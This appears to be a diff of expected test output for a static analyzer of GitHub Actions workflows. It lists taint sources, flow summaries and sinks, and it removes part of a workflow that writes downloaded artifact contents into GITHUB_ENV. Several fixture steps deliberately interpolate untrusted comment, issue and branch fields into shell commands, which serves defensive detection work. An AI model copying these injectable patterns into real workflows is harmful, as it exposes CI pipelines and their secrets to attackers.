on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | +| dorny/paths-filter | * | output.changes | PR changed files | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.all | PR changed files | manual | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | +| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | +| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | +| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | +| tj-actions/changed-files | * | output.added_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | +| trilom/file-changes-action | * | output.files | PR changed files | manual | +| trilom/file-changes-action | * | output.files_added | PR changed files | manual | +| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | +| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | +| tzkhan/pr-update-action | * | output.headMatch | | manual | +| xt0rted/slash-command-action | * | output.command-arguments | | manual | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +calls +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $( { - return artifact.name == "oc-code-coverage" - })[0]; - let download = await github.rest.actions.downloadArtifact({ - owner: context.repo.owner, - repo: context.repo.repo, - artifact_id: matchArtifact.id, - archive_format: 'zip', - }); - let fs = require('fs'); - fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' - run: unzip oc-code-coverage.zip -d coverage - - name: set env vars - run: | - echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV - echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV - # on develop branch, only run a baseline scan - - name: SonarCloud Scan (Baseline) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD == 'develop' - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ 